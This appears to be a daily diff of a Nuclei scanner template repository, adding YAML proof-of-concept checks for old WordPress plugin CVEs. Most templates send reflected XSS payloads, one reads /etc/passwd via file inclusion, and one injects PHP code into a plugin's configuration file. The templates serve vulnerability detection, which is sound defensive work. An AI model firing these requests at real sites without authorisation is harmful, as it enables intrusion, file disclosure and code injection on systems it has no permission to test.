20241205

date.txt

@@ -1 +1 @@
-20241204
+20241205

poc/cve/CVE-2011-4618-2071.yaml

@@ -0,0 +1,39 @@
+id: CVE-2011-4618
+
+info:
+  name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+    - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589
+    - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
+    - http://www.securityfocus.com/archive/1/520589
+  remediation: Upgrade to a supported version.
+  classification:
+    cve-id: CVE-2011-4618
+  tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/18

poc/cve/CVE-2011-5181-2117.yaml

@@ -0,0 +1,30 @@
+id: CVE-2011-5181
+
+info:
+  name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2014-9094-2417.yaml

@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+  name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+  author: daffainfo
+  severity: medium
+  description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+  tags: cve,cve2014,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2015-1000012-2462.yaml

@@ -0,0 +1,28 @@
+id: CVE-2015-1000012
+info:
+  name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+  author: daffainfo
+  severity: high
+  reference:
+    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2015-1000012
+    cwe-id: CWE-200
+  description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2015-2807-2497.yaml

@@ -0,0 +1,27 @@
+id: CVE-2015-2807
+info:
+  name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
+  tags: cve,cve2015,wordpress,wp-plugin,xss
+  description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2015-7377-2593.yaml

@@ -0,0 +1,32 @@
+id: CVE-2015-7377
+
+info:
+  name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7377
+
+  description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2016-1000136-2689.yaml

@@ -0,0 +1,37 @@
+id: CVE-2016-1000136
+
+info:
+  name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin heat-trackr v1.0
+  reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
+
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000136
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2016-1000138-2697.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000138
+info:
+  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000138
+    cwe-id: CWE-79
+  description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2016-1000149-2725.yaml

@@ -0,0 +1,35 @@
+id: CVE-2016-1000149
+
+info:
+  name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000149
+    cwe-id: CWE-79
+  description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2016-1000152-2731.yaml

@@ -0,0 +1,35 @@
+id: CVE-2016-1000152
+
+info:
+  name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin tidio-form v1.0
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
+
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000152
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2016-10960-2763.yaml

@@ -0,0 +1,34 @@
+id: CVE-2016-10960
+
+info:
+  name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+  author: daffainfo
+  severity: high
+  description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+  reference:
+    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+  tags: cve,cve2016,wordpress,wp-plugin,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2016-10960
+    cwe-id: CWE-20
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+    body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nuclei: CVE-2016-10960"
+        condition: and
+        part: header
+      - type: status
+        status:
+          - 200